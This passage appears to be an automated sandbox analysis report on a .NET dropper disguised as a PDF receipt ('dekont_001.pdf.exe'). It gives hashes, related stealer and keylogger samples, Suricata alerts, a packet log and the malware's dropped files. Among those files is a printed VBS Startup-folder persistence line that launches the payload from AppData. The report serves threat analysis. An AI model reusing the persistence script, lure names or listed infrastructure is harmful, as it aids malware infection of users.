gv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YE	Get hash	malicious	Unknown	Browse	188.114.97.3
	cabbage.exe	Get hash	malicious	Atlantida Stealer	Browse	188.114.97.3
	Bank transfer receipt 241015.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Certificado FNMT-RCM.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Justificante.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	n#U00ba 7064-2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Factura 1-014685.pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	SOLICITUD URGENTE RFQ-05567.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbs	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Factura n#U00baB-2542.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	http://usps.com-taroper.top/us	Get hash	malicious	Unknown	Browse	188.132.193.46
	http://ERICADLERCLOTHING.com	Get hash	malicious	Unknown	Browse	188.132.193.46
	kingdom.ps1	Get hash	malicious	Atlantida Stealer	Browse	188.132.193.46
	__5A1AACAD-4F60-4DC8-94AA-4866010B7794_.bat	Get hash	malicious	Unknown	Browse	188.132.193.46
	RFQ_24196MR_PDF.vbs	Get hash	malicious	GuLoader	Browse	188.132.193.46
	3coxOaV92n.exe	Get hash	malicious	ScreenConnect Tool	Browse	188.132.193.46
	khwHsyfsJ1.exe	Get hash	malicious	ScreenConnect Tool	Browse	188.132.193.46
	Qjq85KfhBC.exe	Get hash	malicious	ScreenConnect Tool	Browse	188.132.193.46
	96r3GgxntQ.exe	Get hash	malicious	ScreenConnect Tool	Browse	188.132.193.46
	e5mSvqt7Ho.exe	Get hash	malicious	ScreenConnect Tool	Browse	188.132.193.46

Process:	C:\Users\user\Desktop\dekont_001.pdf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	6656
Entropy (8bit):	4.731654395741773
Encrypted:	false
SSDEEP:	96:ItlJkasxKUdSgvFKruk4Z50q1NjY2CMOt50vplejzNt:Fx5SgvFG4HtjY2omvLel
MD5:	E8988AD104148396F3BBC969C3E84A94
SHA1:	B2F862133633E4DD69DEBB0D12C926C7CFBFA29F
SHA-256:	E83231FA6C8D4DF75581B44FAA0180BC822F28168E12ED7590BA8C06A879A55E
SHA-512:	D736E729E6EA1B7D2A28BBB4DA40B3B1202CFAED35ED0CFC883F249D8D61F9B89534FABB26CA27595C140BDB72131622AAB4D5F3E12FED67EEBC67A76282852E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g............................./... ...@....@.. ....................................`.................................</..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p/......H........"...............................................................(....&.s...........(....F.o....r...p(.......0..K.......s.....(.......(....u......(....r...p .......o....(...........9.....o...............6<.......0..K.......(.......(....u......(....o....~....%:....&~..........s....%.....(...+(......0..$.......(.......(....u....(......(....(....*.0..........ra..p(.....r...p(.....(.......(....u.......(....s..........o......s...........s ...........io!.....o"...(...

C:\Users\user\AppData\Roaming\Id.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\dekont_001.pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs

Download File

Process:	C:\Users\user\Desktop\dekont_001.pdf.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	77
Entropy (8bit):	4.768292021405887
Encrypted:	false
SSDEEP:	3:FER/n0eFHHot+kiEaKC5vdOn:FER/lFHIwknaZ5vdO
MD5:	2299459E205AFD2406119A9E3CF8E36A
SHA1:	3A764839617A9AB832CCAAEA9E50970A9B7966B9
SHA-256:	D6295A21E781BD87CBBB62DA4B43A692E746636F70B37146BC97C981BE1FAF6E
SHA-512:	C962FD699EFB9FC0D2813A9B74398B428E8472D05B758187D942B75F6D78191341F86DBAA0559E3358AD4F99798D7518A70797174E8B6B4DA9849814934890F9
Malicious:	true
Reputation:	low
Preview:	CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Id.exe"""

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.731654395741773
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	dekont_001.pdf.exe
File size:	6'656 bytes
MD5:	e8988ad104148396f3bbc969c3e84a94
SHA1:	b2f862133633e4dd69debb0d12c926c7cfbfa29f
SHA256:	e83231fa6c8d4df75581b44faa0180bc822f28168e12ed7590ba8c06a879a55e
SHA512:	d736e729e6ea1b7d2a28bbb4da40b3b1202cfaed35ed0cfc883f249d8d61f9b89534fabb26ca27595c140bdb72131622aab4d5f3e12fed67eebc67a76282852e
SSDEEP:	96:ItlJkasxKUdSgvFKruk4Z50q1NjY2CMOt50vplejzNt:Fx5SgvFG4HtjY2omvLel
TLSH:	2ED1C710A3E54676EDBA0B74EC7B83409638F3525C67CF6E3C8D220B0D167850BA3B65
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g............................./... ...@....@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x402f8e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x671B7FD2 [Fri Oct 25 11:24:02 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2f3c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x5b6	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xf94	0x1000	b47af94a35d6a914678ce76ea93a14ad	False	0.585693359375	data	5.401258406768588	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x4000	0x5b6	0x600	3ad3e841947813abaf6beb3e80b39b25	False	0.4192708333333333	data	4.097210788930444	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6000	0xc	0x200	1b0ce418acf174b0b57e41d12e14fbf1	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x40a0	0x32c	data			0.4248768472906404
RT_MANIFEST	0x43cc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-25T21:27:06.732147+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49731	158.101.44.242	80	TCP
2024-10-25T21:27:07.872747+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49731	158.101.44.242	80	TCP
2024-10-25T21:27:08.634344+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49733	188.114.97.3	443	TCP
2024-10-25T21:27:09.388391+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49734	158.101.44.242	80	TCP
2024-10-25T21:27:10.872949+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49736	158.101.44.242	80	TCP
2024-10-25T21:27:12.279055+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49738	158.101.44.242	80	TCP
2024-10-25T21:27:13.046368+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49739	188.114.97.3	443	TCP
2024-10-25T21:27:14.512086+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49741	188.114.97.3	443	TCP
2024-10-25T21:27:23.169700+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49753	158.101.44.242	80	TCP
2024-10-25T21:27:24.450911+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49753	158.101.44.242	80	TCP
2024-10-25T21:27:25.172792+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49755	188.114.97.3	443	TCP
2024-10-25T21:27:25.888409+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49756	158.101.44.242	80	TCP
2024-10-25T21:27:30.891726+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49763	188.114.97.3	443	TCP
2024-10-25T21:27:33.762417+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49767	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 25, 2024 21:26:58.019998074 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:26:58.020030022 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:26:58.020332098 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:26:58.035625935 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:26:58.035636902 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:26:59.873754978 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:26:59.873830080 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:26:59.879832983 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:26:59.879842997 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:26:59.880157948 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:26:59.931160927 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:26:59.975331068 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:00.218590975 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:00.263371944 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:00.379496098 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:00.379508972 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:00.379549026 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:00.379566908 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:00.379580021 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:00.379601002 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:00.379617929 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:00.379659891 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:00.379683018 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:00.541062117 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:00.541075945 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:00.541152954 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:00.541282892 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:00.541282892 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:00.541300058 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:00.541340113 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:00.663153887 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:00.663176060 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:00.663428068 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:00.663450003 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:00.663496017 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:00.784869909 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:00.784892082 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:00.784980059 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:00.785006046 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:00.785224915 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:00.906797886 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:00.906819105 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:00.906900883 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:00.906914949 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:00.910969019 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.028647900 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.028671980 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.028862000 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.028873920 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.028918028 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.150788069 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.150857925 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.150998116 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.150998116 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.151012897 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.155836105 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.232675076 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.232697010 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.232768059 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.232784986 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.232844114 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.314575911 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.314594984 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.314651966 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.314661980 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.314692974 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.314718962 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.395467997 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.395488024 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.405188084 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.405204058 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.405392885 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.516865969 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.516886950 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.516957045 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.516988039 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.517003059 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.517028093 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.638072014 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.638089895 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.638223886 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.638237000 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.638298988 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.719820023 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.719835997 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.719896078 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.719906092 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.719958067 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.761225939 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.761241913 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.761295080 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.761302948 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.761389971 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.882210970 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.882231951 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.882319927 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.882335901 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.882399082 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.963867903 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.963890076 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.963942051 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.963954926 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:01.963968039 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:01.963994026 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.008490086 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.008507013 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.008582115 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.008590937 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.009841919 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.132270098 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.132298946 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.132438898 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.132452011 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.132493019 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.173501015 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.173521042 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.173736095 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.173748970 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.173803091 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.258202076 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.258232117 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.258402109 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.258411884 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.258455038 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.329374075 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.329397917 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.329569101 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.329577923 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.329628944 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.370505095 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.370522976 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.370580912 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.370592117 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.370623112 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.370635986 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.451430082 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.451477051 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.451520920 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.451529980 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.451673985 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.451673985 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.492821932 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.492867947 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.492896080 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.492903948 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.492943048 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.492954016 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.573802948 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.573823929 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.573923111 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.573944092 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.573956966 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.573991060 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.614711046 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.614772081 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.614785910 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.614799976 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.614821911 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.614831924 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.695262909 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.695297003 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.695427895 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.695460081 CEST	443	49730	188.132.193.46	192.168.2.4
